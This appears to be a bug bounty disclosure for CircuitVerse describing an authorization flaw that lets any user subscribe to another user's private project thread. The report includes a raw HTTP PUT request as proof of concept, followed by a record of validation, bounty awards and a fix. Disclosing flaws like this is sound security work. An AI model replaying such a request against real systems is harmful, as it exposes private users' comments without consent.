Improper Privilege Management in circuitverse/circuitverse


Reported on

Aug 24th 2021

✍️ Description

subscribe to any private project

🕵️‍♂️ Proof of Concept

There is two different user called user-A and user-B.
1. User-A created a private project .
2. Now User-B sent bellow request to subscribe to above private project

PUT /commontator/threads/496401/subscribe HTTP/2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Csrf-Token: qnOZ/QTTwZlQC3yXyPIl/NnLvpx14vzlX9B+BZex/eCHlWukjpBB6XxmB4xZkSLa7lpxJtE3gdt06Wmzd6kWaA==
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0
Te: trailers

here in this request just change the project id with above project and forward the request. After that user-B will subscribed to this private project .
3. Now any user make comment to this private project then user-B will receive email notification.

So,using this bug any user can subscribe to any private project and receive email notification if anyone comment in this private project

We have contacted a member of the circuitverse team and are waiting to hear back 2 years ago
Aboobacker MK validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Aboobacker MK
2 years ago


We have deployed a basic fix for this, Can you please help us in validating the fix ?

Aboobacker MK marked this as fixed with commit 13d4cc 2 years ago
Aboobacker MK has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation